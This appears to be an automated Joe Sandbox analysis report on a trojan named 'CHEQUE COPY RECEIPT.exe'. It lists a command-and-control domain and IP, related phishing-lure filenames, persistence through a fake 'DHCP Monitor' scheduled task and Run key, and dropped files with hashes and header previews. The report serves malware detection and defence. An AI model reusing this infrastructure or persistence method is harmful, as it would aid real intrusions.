chinomso.duckdns.org	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	CHEQUE COPY RECEIPT.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	CHEQUE COPY RECEIPT.exe	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.150.24.55	unknown	Netherlands		44592	SKYLINKNL	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	355858
Start date:	22.02.2021
Start time:	08:16:38
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CHEQUE COPY RECEIPT.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@14/18@17/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 13.7% (good quality ratio 13%) Quality average: 81.9% Quality standard deviation: 27.8%
HCA Information:	Successful, ratio: 85% Number of executed functions: 125 Number of non-executed functions: 90
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.43.139.144, 92.122.145.220, 40.88.32.150, 13.88.21.125, 184.30.24.56, 51.104.139.180, 205.185.216.42, 205.185.216.10, 51.103.5.159, 92.122.213.194, 92.122.213.247, 20.54.26.129 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
08:17:36	API Interceptor	1003x Sleep call for process: CHEQUE COPY RECEIPT.exe modified
08:17:37	Task Scheduler	Run new task: DHCP Monitor path: "C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" s>$(Arg0)
08:17:38	Task Scheduler	Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
08:17:38	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.150.24.55	CHEQUE COPY.exe	Get hash	malicious	Browse
	CHEQUE COPY.jar	Get hash	malicious	Browse
	PAYMENT COPY RECEIPT.exe	Get hash	malicious	Browse
	FeDEx TRACKING DETAILS.exe	Get hash	malicious	Browse
	FeDEx TRACKING DETAILS.exe	Get hash	malicious	Browse
	FedEx TRACKING DETAILS.exe	Get hash	malicious	Browse
	TNT TRACKING DETAILS.exe	Get hash	malicious	Browse
	TNT TRACKING DETAILS.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
chinomso.duckdns.org	CHEQUE COPY.exe	Get hash	malicious	Browse	185.150.24.55
	PAYMENT COPY RECEIPT.exe	Get hash	malicious	Browse	185.150.24.55
	Shiping Doc BL.exe	Get hash	malicious	Browse	194.5.98.157
	Shiping Doc BL.exe	Get hash	malicious	Browse	194.5.98.157
	Shiping Doc BL.exe	Get hash	malicious	Browse	194.5.98.157
	Shiping Doc BL.exe	Get hash	malicious	Browse	194.5.98.157
	Shiping Doc BL.exe	Get hash	malicious	Browse	194.5.98.157
	Shiping Doc BL.exe	Get hash	malicious	Browse	194.5.98.157
	DHL AWB TRACKING DETAIL.exe	Get hash	malicious	Browse	194.5.98.56
	odou7cg844.exe	Get hash	malicious	Browse	129.205.124.145
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	Browse	185.244.30.86
	AWB RECEIPT.exe	Get hash	malicious	Browse	129.205.124.132
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	Browse	129.205.113.246
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	Browse	197.210.227.36
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	Browse	185.244.30.39
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	Browse	129.205.124.140
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	Browse	197.210.85.85
	DHL AWB TRACKING DETAIILS.exe	Get hash	malicious	Browse	185.244.30.39
	39Quot.exe	Get hash	malicious	Browse	185.165.153.35

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SKYLINKNL	CHEQUE COPY.exe	Get hash	malicious	Browse	185.150.24.55
	Quotation-3276.PDF.exe	Get hash	malicious	Browse	185.150.24.44
	CHEQUE COPY.jar	Get hash	malicious	Browse	185.150.24.55
	MRC20201030XMY, pdf.exe	Get hash	malicious	Browse	185.150.24.6
	PAYMENT COPY RECEIPT.exe	Get hash	malicious	Browse	185.150.24.55
	FeDEx TRACKING DETAILS.exe	Get hash	malicious	Browse	185.150.24.55
	FeDEx TRACKING DETAILS.exe	Get hash	malicious	Browse	185.150.24.55
	FedEx TRACKING DETAILS.exe	Get hash	malicious	Browse	185.150.24.55
	TNT TRACKING DETAILS.exe	Get hash	malicious	Browse	185.150.24.55
	TNT TRACKING DETAILS.exe	Get hash	malicious	Browse	185.150.24.55
	QUOTATION 20 10 2020.exe	Get hash	malicious	Browse	185.150.24.48
	NEW PO638363483.exe	Get hash	malicious	Browse	185.150.24.9
	NEW PO6487382.exe	Get hash	malicious	Browse	185.150.24.9

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nscD29E.tmp\System.dll	Remittance copy.xlsx	Get hash	malicious	Browse
	CI + PL.xlsx	Get hash	malicious	Browse
	RFQ_Enquiry_0002379_.xlsx	Get hash	malicious	Browse
	QUOTATION.exe	Get hash	malicious	Browse
	AgroAG008021921doc_pdf.exe	Get hash	malicious	Browse
	CHEQUE COPY.exe	Get hash	malicious	Browse
	Bank Details.exe	Get hash	malicious	Browse
	Re-QUOTATION.exe	Get hash	malicious	Browse
	shed.exe	Get hash	malicious	Browse
	purchase order.exe	Get hash	malicious	Browse
	QUOTATION_PDF_SCAN_COPY.exe	Get hash	malicious	Browse
	DHL Shipment Notification 7465649870,pdf.exe	Get hash	malicious	Browse
	Firm Order.exe	Get hash	malicious	Browse
	Documents_pdf.exe	Get hash	malicious	Browse
	QUOTATION.exe	Get hash	malicious	Browse
	banka bilgisi.exe	Get hash	malicious	Browse
	MV TEAL BULKERS.xlsx	Get hash	malicious	Browse
	ForeignRemittance_20210219_USD.xlsx	Get hash	malicious	Browse
	HBL VRNA00872.xlsx	Get hash	malicious	Browse
	statement.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	332470
Entropy (8bit):	7.947810553618582
Encrypted:	false
SSDEEP:	6144:y11QYLAKZReuEow82wBH6T6Evt4W6cUq5Aj+h3dDIge:GLAKZ8uPTBHW6C2DqCjOVIge
MD5:	403180100F3D966D4EA44C84D039A6D0
SHA1:	4B1AF3FD502AD953024CB152C5A6D472FD0307C7
SHA-256:	18CA07A540DBD6DA66851F88C11AD7683486E33F5C2512FE5C4837C44F8F4BC3
SHA-512:	1F6AB19D8B0F69BF7C4F9917966B6D6D818148D8FC10ABC1D03B6F08F82C5C59EF449961E9D4055FA691854A216C3EA276ED659739D509A12A38CE6AC2C3640D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG.sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@.......................................@.................................D........................................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...XU...........~..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CHEQUE COPY RECEIPT.exe.log Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dll Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	6.85576811002407
Encrypted:	false
SSDEEP:	192:zkIRjWfxhSuP+Oi/+2UNgPQ3XBVCsobJdeS/1+jzpGI9F+YM+G:hjorGbqNNxmdeS/CzpR75Z
MD5:	524D2FC0515E13C4101D1BAA1BAC0B33
SHA1:	2F035F68B3E69295B2AA664F5A87AF3EEF7D0779
SHA-256:	6EF18EA8431521E2D1720FB2634BE322628C95873A91BDBAA656C2031FD591B4
SHA-512:	033F2367E1C848E87B3C6A4A0E6BF926EB429CEDD7FDC3F0F5C1F48CD0ACCCD74452127F2C54C64C2804496D020A8EC85C0C74859212516FF7BF30D593FAEB6D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 15%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..e-K.e-K.e-K.e,K.e-KI..K.e-K...K.e-K...K.e-K...K.e-K...K.e-KRich.e-K........PE..L....F3`...........!.........$............... ...............................`.......................................$..I.... .......P............................................................................... ...............................text...F........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........P.......*..............@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nscD29E.tmp\System.dll Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.855045165595541
Encrypted:	false
SSDEEP:	192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:	FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:	30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:	6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:	F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Remittance copy.xlsx, Detection: malicious, Browse Filename: CI + PL.xlsx, Detection: malicious, Browse Filename: RFQ_Enquiry_0002379_.xlsx, Detection: malicious, Browse Filename: QUOTATION.exe, Detection: malicious, Browse Filename: AgroAG008021921doc_pdf.exe, Detection: malicious, Browse Filename: CHEQUE COPY.exe, Detection: malicious, Browse Filename: Bank Details.exe, Detection: malicious, Browse Filename: Re-QUOTATION.exe, Detection: malicious, Browse Filename: shed.exe, Detection: malicious, Browse Filename: purchase order.exe, Detection: malicious, Browse Filename: QUOTATION_PDF_SCAN_COPY.exe, Detection: malicious, Browse Filename: DHL Shipment Notification 7465649870,pdf.exe, Detection: malicious, Browse Filename: Firm Order.exe, Detection: malicious, Browse Filename: Documents_pdf.exe, Detection: malicious, Browse Filename: QUOTATION.exe, Detection: malicious, Browse Filename: banka bilgisi.exe, Detection: malicious, Browse Filename: MV TEAL BULKERS.xlsx, Detection: malicious, Browse Filename: ForeignRemittance_20210219_USD.xlsx, Detection: malicious, Browse Filename: HBL VRNA00872.xlsx, Detection: malicious, Browse Filename: statement.xlsx, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsfF3F1.tmp\System.dll Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.855045165595541
Encrypted:	false
SSDEEP:	192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:	FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:	30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:	6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:	F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsmD23F.tmp Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	data
Category:	dropped
Size (bytes):	305602
Entropy (8bit):	7.945679989464754
Encrypted:	false
SSDEEP:	6144:91PFuEow02wJHCT6EvtcW6SUq5AD+h3jIgQt:jduPZJHu6CmtqCDOzjE
MD5:	BAFB51AF8D8FF08D01E2C763A5CDC87D
SHA1:	026DC8B1A11688CC135AF98FB4EFE7CD95743955
SHA-256:	FB17C53CF1546570005A12AB4F3B38FBF6D5E9E54732D97C4BC9FEB40ED0D21D
SHA-512:	F140BDE9F8763F29CFB102F7ACE92DC75C961DBC9FC9833E2ED8A66585F962A5327B5043D7D77C8A49E8E6950D3FFA63A0979CF5C105D4741D4F73955B88857E
Malicious:	false
Preview:	........,...................$...............................................................................................................................................................................................................................................................J...............(...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsqF603.tmp Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	data
Category:	dropped
Size (bytes):	21764
Entropy (8bit):	6.882198527361556
Encrypted:	false
SSDEEP:	384:9BjorGbqNNxmdeS/CzpR75Zf4Vhbpds1zm/eHgyF:9Crmqx4eS/Krl54VhFEgyF
MD5:	C3EE4DAA11E8DE8826566576CD5E1F6C
SHA1:	880EF4E0E5EA3EA3EF5C115E5E159C02CFA54FCA
SHA-256:	D643061A0EF3D42B1B7AD8B00A677C5A431E19FDEFCEC9BCD1D52BA225ACBF87
SHA-512:	2DCDBA8FD8F8A06F3F0AAD2C5799DC6E8F34D958DC7BC7D1FBD2E36C12ED8B81E544AFA449353B0878B3902BC1A0C99620DECD999C726709F8FE7D901CD9B9D3
Malicious:	false
Preview:	........,...................$...............................................................................................................................................................................................................................................................J...............(...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsu1979.tmp Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	data
Category:	dropped
Size (bytes):	21764
Entropy (8bit):	6.882198527361556
Encrypted:	false
SSDEEP:	384:9BjorGbqNNxmdeS/CzpR75Zf4Vhbpds1zm/eHgyF:9Crmqx4eS/Krl54VhFEgyF
MD5:	C3EE4DAA11E8DE8826566576CD5E1F6C
SHA1:	880EF4E0E5EA3EA3EF5C115E5E159C02CFA54FCA
SHA-256:	D643061A0EF3D42B1B7AD8B00A677C5A431E19FDEFCEC9BCD1D52BA225ACBF87
SHA-512:	2DCDBA8FD8F8A06F3F0AAD2C5799DC6E8F34D958DC7BC7D1FBD2E36C12ED8B81E544AFA449353B0878B3902BC1A0C99620DECD999C726709F8FE7D901CD9B9D3
Malicious:	false
Preview:	........,...................$...............................................................................................................................................................................................................................................................J...............(...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsvF3B2.tmp Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	data
Category:	dropped
Size (bytes):	305602
Entropy (8bit):	7.945679989464754
Encrypted:	false
SSDEEP:	6144:91PFuEow02wJHCT6EvtcW6SUq5AD+h3jIgQt:jduPZJHu6CmtqCDOzjE
MD5:	BAFB51AF8D8FF08D01E2C763A5CDC87D
SHA1:	026DC8B1A11688CC135AF98FB4EFE7CD95743955
SHA-256:	FB17C53CF1546570005A12AB4F3B38FBF6D5E9E54732D97C4BC9FEB40ED0D21D
SHA-512:	F140BDE9F8763F29CFB102F7ACE92DC75C961DBC9FC9833E2ED8A66585F962A5327B5043D7D77C8A49E8E6950D3FFA63A0979CF5C105D4741D4F73955B88857E
Malicious:	false
Preview:	........,...................$...............................................................................................................................................................................................................................................................J...............(...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\oonrzjdqx.im Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	data
Category:	dropped
Size (bytes):	279040
Entropy (8bit):	7.999273333249887
Encrypted:	true
SSDEEP:	6144:WPFuEow02wJHCT6EvtcW6SUq5AD+h3jIgd:WduPZJHu6CmtqCDOzjd
MD5:	8B62F2C193687E33B28430F6132F4D2D
SHA1:	7794A9B612177B7AED06580622CF0B7163241867
SHA-256:	5F68BA0AF0A904A8DFE28F0D947F64ECF94E01FF89419D4AAF6864DA8C7AA094
SHA-512:	1B2149EEE60D96582D3420C54E392B8730395A5F9D468E25A427BCBA19B61ADEE030934B00EF792249085EFA649F1DDFDB2477B13C482AE21411474604BCEB6B
Malicious:	false
Preview:	.6.v...a.Cv...w...x..Y+...).x.p.gKN0bL.p..M2..u&..........x.......s,.^..4.....w.l.......t,h..?..[(....B<6\|..S........h..%..I.c.O>%.......c..e{...jD..Td...K....[:..[......W....SD.-[f3><&zl`..._..^..Q.\|6..g...7..V.i. .j.n.s.LI..[.#..# .d.2...y.. 7C+!.....d...Z.....3.&[.....7N....b;..P3.<<...@.U.:..o........O.i4a..r.......P...Lp..crh.<...u...S)X....2...u.Q.:.....nQ.T....u_A9...r..........hi.A..)....p..>Y.I.,]./.1............JTM>..2.....#-R.....}..H....p....O...^...r\.wSml.j....1IE.Z_....OT2...ll..3.V...X6:......u.c-.Av./..... .R...^.....:.Z,..s.....#.......L.h>q...#[t!.qC.Eb:.........@.D.&...5.r.p<ZT.Z\|R.i........^.:..$B..H$@.o./.............C...g....M.......V.V..........x.....h._...1.}.......xE..).k..:B.../.....5.'.......^.G..!.2...9.....Y"rZI.O..... Z...R....%.......$E.7P/E.n_...q%..s.....F..t.:.......@.$^..m.Z.d......&....3....!C....*.T..n...&.e....su.{;...y.v.Y...x.R..&......@...!.w.G.5:.Kc...e5[...'z....uJ.C1........k..h

C:\Users\user\AppData\Local\Temp\tmpE682.tmp Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.118330408737918
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0PWxtn:cbk4oL600QydbQxIYODOLedq3SWj
MD5:	419B9BAF87B2D10BE7542CC9C964DE83
SHA1:	78452D57F42AD197A0414E7904E90C775F013AA8
SHA-256:	30D414E1ACE9688F68A91CD57B3FFEE2817D9DD83419F5CFD2CD2EBE547080A8
SHA-512:	9F4CD8884F6889291E1A9A5767BFC034837A9507DE27656E92FB4B7E506B5FF03D2A269EB5F870C5953B47C6BF62B93A6A7DF8511022D0345EBE8AB0481E34EE
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmpEA6B.tmp Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.109425792877704
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
MD5:	5C2F41CFC6F988C859DA7D727AC2B62A
SHA1:	68999C85FC7E37BAB9216E0099836D40D4545C1C
SHA-256:	98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
SHA-512:	B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe
File Type:	data
Category:	modified
Size (bytes):	2320
Entropy (8bit):	7.024371743172393
Encrypted:	false
SSDEEP:	48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwh:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCr
MD5:	0FBED11864C03FDED0E70014DCF84578
SHA1:	453723D938A03252F705B0A104986FE4C5CA7056
SHA-256:	70F5E49EE3091777827ED661B63842061220C899A708860986E9AA1BD87C5004
SHA-512:	DB53E3F1D18171F1D86C1B9BBF6BBD07153FC3E561834A35834BC0CA1E034FEDCD83AAAE7EDF9262C4E175C3D2287B647F55282E49627EAAF587F43714204667
Malicious:	false
